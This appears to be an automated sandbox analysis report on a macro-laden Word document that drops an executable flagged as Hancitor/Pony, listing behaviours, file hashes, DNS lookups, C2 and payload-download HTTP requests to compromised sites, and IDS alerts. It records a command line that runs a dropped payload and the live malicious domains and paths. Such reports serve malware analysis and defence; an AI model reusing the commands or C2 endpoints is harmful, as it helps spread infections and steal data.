-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF9C95422EEF3A26C8.TMP"
"WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61684"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61684"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\MU_IMDS10_S-1-5-5-0-61684"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208"
"\Sessions\1\BaseNamedObjects\DBWinMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\RasPbFile" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 62EB0000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.CC8="4""
Process "extra_embedded_0.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G", MpConfig_ProductUserAppDataPath="C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows Defender", LOGONSERVER="\\PSPUBWS-PC", HOMEPATH="\Users\PSPUBWS", MpConfig_ProductAppDataPath="%ALLUSERSPROFILE%\Microsoft\Windows Defender", MpConfig_ProductPath="%PROGRAMFILES%\Windows Defender", HOMEDRIVE="C:", MpConfig_ProductCodeName="AntiSpyware", MpConfig_ReportingGUID="D9765A22-4A32-46A9-92CB-043F61DC4FA2""
Process "extra_embedded_0.exe" (Show Process) was launched with modified environment variables: "LOCALAPPDATA, TMP, USERDOMAIN, USERNAME, USERPROFILE, TEMP, APPDATA" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "/c ping localhost -n 100 && %TEMP%\6.pif" on 2018-12-10.19:30:01.181
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c ping localhost -n 100 && %TEMP%\6.pif" (Show Process)
Spawned process "PING.EXE" with commandline "ping localhost -n 100" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"2018-12-10-downloaded-Word-doc-with-macro-for-emotet.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Dec 11 03:27:30 2018 mtime=Tue Dec 11 03:27:30 2018 atime=Tue Dec 11 03:28:01 2018 length=324576 window=hide"
"~_18-12-10-downloaded-Word-doc-with-macro-for-emotet.doc" has type "data"
"MSForms.exd" has type "data"
"index.dat" has type "data"
"A7F9A125.emf" has type "Windows Enhanced Metafile (EMF) image data version 0x10000"
"BA7EECE2.png" has type "PNG image data 950 x 600 8-bit/color RGBA non-interlaced"
"~WRS_6BF65F21-8CCE-47B9-B3B8-A985AF752E4B_.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~WRD0000.tmp" has type "Microsoft Word 2007+"
"~WRS_B4352521-F5F3-4AE1-8E53-57687BE403FC_.tmp" has type "data"
"~_Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6BF65F21-8CCE-47B9-B3B8-A985AF752E4B}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "api.ipify.org"
Heuristic match: "henmerecrob.com"
Heuristic match: "itssprout.com"
Heuristic match: "apathtoinnerpeace.com"
Heuristic match: "hk3fitness.com"
Heuristic match: "sycamoreelitefitness.com"
Pattern match: "xK.kt/S9z.0F7,\5_cjc"
Pattern match: "oUF.gd/Q/$$JzO]wc2Ns"
Heuristic match: "kg&7SLHM_*K1q{6E5Y-b[EV.al" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Filename
- 2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Size
- 317KiB (324576 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 2827845a9c77b29d5d4362365107dae1accb79dc89947446ad83c12421b45621
- MD5
- 64dd6dc51c359fe9d14e7775a6291b92
- SHA1
- 37b9815194ed7c2cf1278d0fcea707592f660aa3
- ssdeep
- 6144:tfconHXx2Y+NZ9yModcFBvZppZvLe1Pxz1dSUTqiNf276r2ZCj7vmWEcGO:VnHXM7eaFRvi1pbSUTqiNf2GrFj+O
Classification (TrID)
- 59.4% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 36.0% (.DOCX) Word Microsoft Office Open XML Format document
- 4.5% (.ZIP) ZIP compressed archive
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 4 processes in total.
- WINWORD.EXE /n "C:\2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc" (PID: 3272)
- extra_embedded_0.exe (PID: 2768) 15/69
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
apathtoinnerpeace.com |
192.185.226.114
TTL: 3600 |
- | United States |
api.ipify.org
OSINT |
54.204.36.156
TTL: 300 |
eNom, Inc.
Name Server: NS1.DNSIMPLE.COM Creation Date: Sun, 05 Jan 2014 22:02:15 GMT |
United States |
henmerecrob.com
OSINT |
185.244.149.11
TTL: 3600 |
CNOBIN INFORMATION TECHNOLOGY LIMITED | Netherlands |
hk3fitness.com
OSINT |
192.232.223.6
TTL: 3600 |
Network Solutions, LLC
Name Server: NS6173.HOSTGATOR.COM Creation Date: Wed, 12 Feb 2014 16:30:28 GMT |
United States |
itssprout.com
OSINT |
192.232.216.139
TTL: 3600 |
GoDaddy.com, LLC
Name Server: NS315.HOSTGATOR.COM Creation Date: Mon, 28 May 2012 17:15:47 GMT |
United States |
sycamoreelitefitness.com
OSINT |
209.188.93.46
TTL: 3600 |
DREAMHOST
Organization: Proxy Protection LLC Name Server: NS1.ASTUTEWEBGROUP.COM Creation Date: Tue, 05 Jun 2012 21:50:39 GMT |
United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
54.204.36.156 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
United States |
185.244.149.11 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
Netherlands |
192.232.216.139 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
United States |
192.185.226.114 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
United States |
192.232.223.6 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
United States |
209.188.93.46 |
80
TCP |
extra_embedded_0.exe PID: 2768 |
United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
54.204.36.156:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache More Details |
185.244.149.11:80 (henmerecrob.com) | POST | henmerecrob.com/4/forum.php | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: henmerecrob.com
Content-Length: 112
Cache-Control: no-cache More Details |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/wp-includes/1 | GET /wp-includes/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache More Details |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache
Connection: Keep-Alive More Details |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/wp-content/themes/twentyfourteen/1 | GET /wp-content/themes/twentyfourteen/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache More Details |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache
Connection: Keep-Alive More Details |
192.232.223.6:80 (hk3fitness.com) | GET | hk3fitness.com/wp-includes/customize/1 | GET /wp-includes/customize/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache More Details |
192.232.223.6:80 (hk3fitness.com) | GET | hk3fitness.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache
Connection: Keep-Alive More Details |
209.188.93.46:80 (sycamoreelitefitness.com) | GET | sycamoreelitefitness.com/modules/DesignManager/1 | GET /modules/DesignManager/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sycamoreelitefitness.com
Cache-Control: no-cache More Details |
185.244.149.11:80 (henmerecrob.com) | POST | henmerecrob.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0
Host: henmerecrob.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 206
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) More Details |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/wp-includes/2 | GET /wp-includes/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache More Details |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache
Connection: Keep-Alive More Details |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/wp-content/themes/twentyfourteen/2 | GET /wp-content/themes/twentyfourteen/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache More Details |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache
Connection: Keep-Alive More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 54.204.36.156:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org | 2021997 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin | 2819978 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | CrowdStrike Hancitor POST Request | 181610701 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2 | 2014411 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | CrowdStrike Pony Request | 181708101 |
209.188.93.46 -> local:52295 (TCP) | A Network Trojan was detected | ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) | 2824549 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
extra_embedded_0.exe.bin
- Size
- 75KiB (76800 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "DangerousObject.Multi" (15/69)
- MD5
- 5758a38fca8a35c2dfb63481c6bde4ad
- SHA1
- fb6712e25ddcc04f8b5bfd3fcf022cfadd2da9c3
- SHA256
- e60ffcbb61eb448085a0375a2ec8f23fdd48198e1a7bc73090320bb4b7705e6e
-
-
Informative 10
-
-
2018-12-10-downloaded-Word-doc-with-macro-for-emotet.LNK
- Size
- 673B (673 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 11 03:27:30 2018, mtime=Tue Dec 11 03:27:30 2018, atime=Tue Dec 11 03:28:01 2018, length=324576, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 6c6d06a87d1bd664de469a63804bd08f
- SHA1
- a6986461a43587f6ecbef43dc6331b230f663c0c
- SHA256
- c7b7e1adc1829b87e03f57afa32aabad3033860d907e70e48338f66de6fba69d
-
index.dat
- Size
- 233B (233 bytes)
- Type
- data
- Runtime Process
- extra_embedded_0.exe (PID: 2768)
- MD5
- e26194adef3ada42b93c53d46a9540d2
- SHA1
- c565b55b456aab1cb6d935d5b4c6d88339407736
- SHA256
- 15c4b3345f5ee8627c31a06a27a2908c34262c3e0a47b78f97a969d9b79e9c79
-
A7F9A125.emf
- Size
- 4.9KiB (4968 bytes)
- Type
- img image
- Description
- Windows Enhanced Metafile (EMF) image data version 0x10000
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 02d606b97d25842ebd7c77caa2f47a96
- SHA1
- d265e94763ceff1ea35ac3c5b9873a442470ea0b
- SHA256
- 99ffc3e38f497690400bf0ba49e5fbdae47c0c866c3445e36d92f64def416bd1
-
BA7EECE2.png
- Size
- 222KiB (227238 bytes)
- Type
- img image
- Description
- PNG image data, 950 x 600, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- e004606e9d7fdd1d04ce54255f2a3e73
- SHA1
- 11df333085689323bf5e151b535fc2fc328b9d97
- SHA256
- 995951d7df3942aa31febf3f17c2b9ca47782e857417c4037704502b2233345b
-
MSForms.exd
- Size
- 163KiB (166724 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 58e01714de768542bbdf5947e00713eb
- SHA1
- cd4dadebd748cc3c67951f11cb3911ae991421cc
- SHA256
- fe963884a60b51c0c476868653d2304a68bffd4583dc4800bf92d85391d87ed1
-
~WRD0000.tmp
- Size
- 512KiB (524288 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 79cf96a5d8ede734211a02e91dffc7e8
- SHA1
- d0020cabb41a5ce32662583e4b7ac37532a592a3
- SHA256
- 19287b620c567b599a6ac70ba62bfc877b5bf07c0e429e4b17ce70e9a5e1fbcc
-
~_18-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 532dc65a706e0cb04b63587484135941
- SHA1
- ee8da634664c9994ca9d8dd270d4c31e7bc7318a
- SHA256
- d23175ae1db73ebb04dd96cab66c8bf6ea56dff3b0963685cfcbe48c67cc246f
-
~WRS_6BF65F21-8CCE-47B9-B3B8-A985AF752E4B_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS_B4352521-F5F3-4AE1-8E53-57687BE403FC_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 8a5cac75c8c090a0f24bdbfa1486a68a
- SHA1
- 822432d9b7284f186052f1d1f9eeacb4f9f16883
- SHA256
- bcde324c8d16948a2383a59c5bfd06cde4cd9b6033e2386c28b38852fc41d5c4
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 532dc65a706e0cb04b63587484135941
- SHA1
- ee8da634664c9994ca9d8dd270d4c31e7bc7318a
- SHA256
- d23175ae1db73ebb04dd96cab66c8bf6ea56dff3b0963685cfcbe48c67cc246f
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all file accesses are visible for PING.EXE (PID: 1748)
- Not all file accesses are visible for cmd.exe (PID: 2928)
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report